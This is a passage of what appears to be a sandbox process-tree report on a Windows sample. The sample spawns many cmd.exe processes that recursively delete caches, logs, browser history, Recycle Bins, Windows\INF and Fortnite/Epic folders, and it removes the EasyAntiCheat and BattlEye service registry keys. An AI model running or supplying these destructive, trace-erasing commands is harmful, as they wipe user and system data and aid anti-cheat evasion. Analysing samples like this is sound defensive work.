    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC
    3⤵
    PID:2132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache
    3⤵
    PID:556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings
    3⤵
    PID:2420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "F:\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:2476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "F:\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:1376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "F:\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:1536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "F:\Program Files\Epic Games\Fortnite\FortniteGame\Config
    3⤵
    PID:2460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "F:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q F:\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q F:\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:2864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:2536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\Temp
    3⤵
    PID:1588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache
    3⤵
    PID:2876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies
    3⤵
    PID:3044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\Microsoft\Windows\History
    3⤵
    PID:1668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\Intel
    3⤵
    PID:2596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
    3⤵
    PID:2408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "F:\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:2664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    PID:2604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:1752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rd /q /s %systemdrive%\$Recycle.Bin >nul 2>&1
    3⤵
    PID:860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rd /q /s d:\$Recycle.Bin >nul 2>&1
    3⤵
    PID:2556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rd /q /s e:\$Recycle.Bin >nul 2>&1
    3⤵
    PID:344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rd /q /s f:\$Recycle.Bin >nul 2>&1
    3⤵
    PID:764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\servicing\InboxFodMetadataCache
    3⤵
    PID:2996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:2812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\Explorer\IconCacheToDelete
    3⤵
    PID:2504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\INF
    3⤵
    - Drops file in Windows directory
    PID:876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\ProgramData\%username%\Microsoft\XboxLive\NSALCache
    3⤵
    PID:1996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\Prefetch
    3⤵
    PID:2432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:2740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:2052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\temp
    3⤵
    PID:2840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\Logs
    3⤵
    PID:1296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:2136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:1744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:1736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:2388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\Prefetch
    3⤵
    PID:1172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\ProgramData\USOShared\Logs
    3⤵
    PID:1676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q %systemdrive%\Users\username%\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\*.*
    3⤵
    PID:1984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:2572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC
    3⤵
    PID:2292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache
    3⤵
    PID:2108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings
    3⤵
    PID:2404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:1352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:2368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:2784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q %systemdrive%\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:1088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q %systemdrive%\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:2704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir / s / q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    PID:2288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:2632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:2000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\INF
    3⤵
    - Drops file in Windows directory
    PID:208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\ProgramData\%username%\Microsoft\XboxLive
    3⤵
    PID:1440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\Public\Documents
    3⤵
    PID:1256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\Prefetch
    3⤵
    PID:988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:1108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:1204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\temp
    3⤵
    PID:2600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:2868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:2256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:3060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:1792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\Prefetch
    3⤵
    PID:2584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q %systemdrive%\Users\username%\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\*.*
    3⤵
    PID:204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:2640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q %systemdrive%\Users\%username%\AppData\Local\Microsoft\XboxLive\*.*
    3⤵
    PID:396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC
    3⤵
    PID:2320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache
    3⤵
    PID:2096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings
    3⤵
    PID:2396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\Config
    3⤵
    PID:2880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:2244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:1960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q %systemdrive%\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:1164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q %systemdrive%\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:2428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:2668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    PID:1660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCache
    3⤵
    PID:1060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies
    3⤵
    PID:1608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\IEDownloadHistory
    3⤵
    PID:2356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\IECompatUaCache
    3⤵
    PID:1528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\IECompatCache
    3⤵
    PID:2532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies\DNTException
    3⤵
    PID:880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE
    3⤵
    PID:2492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\History
    3⤵
    PID:2440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\History\Low
    3⤵
    PID:836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState
    3⤵
    PID:2984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalCache\EcsCache0
    3⤵
    PID:2040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState
    3⤵
    PID:1416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3
    3⤵
    PID:2132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\Intel
    3⤵
    PID:556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
    3⤵
    PID:2420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:2476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:1376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\EpicGamesLauncher
    3⤵
    PID:1536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\UnrealEngine
    3⤵
    PID:2460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\UnrealEngineLauncher
    3⤵
    PID:532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD
    3⤵
    PID:956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\INTEL
    3⤵
    PID:892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\ntuser.ini
    3⤵
    PID:2864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\LocalLow\Microsoft\CryptnetUrlCache
    3⤵
    PID:2076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\System Volume Information\IndexerVolumeGuid
    3⤵
    PID:2328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\CLR_v4.0
    3⤵
    PID:2916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\CLR_v3.0
    3⤵
    PID:2752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\Microsoft\Internet Explorer\Recovery
    3⤵
    PID:2072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Feeds
    3⤵
    PID:2988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /q %systemdrive%\Windows\System32\restore\MachineGuid.txt
    3⤵
    PID:2168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /q %systemdrive%\ProgramData\Microsoft\Windows\WER
    3⤵
    PID:2720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /q %systemdrive%\Users\Public\Libraries
    3⤵
    PID:2820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /q %systemdrive%\MSOCache
    3⤵
    PID:3020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:2980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\WebCache
    3⤵
    PID:2284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    3⤵
    PID:2792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\ConnectedDevicesPlatform\L.%username%\ActivitiesCache.db-wal
    3⤵
    PID:2964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
    3⤵
    PID:2812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\ProgramData\USOShared\Logs\User
    3⤵
    PID:2504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /q %systemdrive%\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\ServiceProfiles\LocalService\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp
    3⤵
    PID:1996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\cache\qtshadercache
    3⤵
    PID:2432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\UsrClass.dat.log2
    3⤵
    PID:2740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD\VkCache
    3⤵
    PID:2052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD\CN\NewsFeed
    3⤵
    PID:2840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE\RHKRUA8J
    3⤵
    PID:1296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\CLR_v4.0\UsageLogs
    3⤵
    PID:2136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\Temp
    3⤵
    PID:1744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp
    3⤵
    PID:1736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:2388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f
    3⤵
    PID:1172
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f
      4⤵
      PID:1676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
    3⤵
    PID:1984
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
      4⤵
      PID:2572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
    3⤵
    PID:2292
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
      4⤵
      PID:2108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:2404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\INF
    3⤵
    - Drops file in Windows directory
    PID:1352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\ProgramData\%username%\Microsoft\XboxLive\NSALCache
    3⤵
    PID:3004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\Public\Documents
    3⤵
    PID:1100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\Prefetch
    3⤵
    PID:1048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\temp
    3⤵
    PID:992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:2008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:1756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:1204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q C:\Users\username%\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\*.*
    3⤵
    PID:2600
- - C:\Windows\system32\cmd.exe
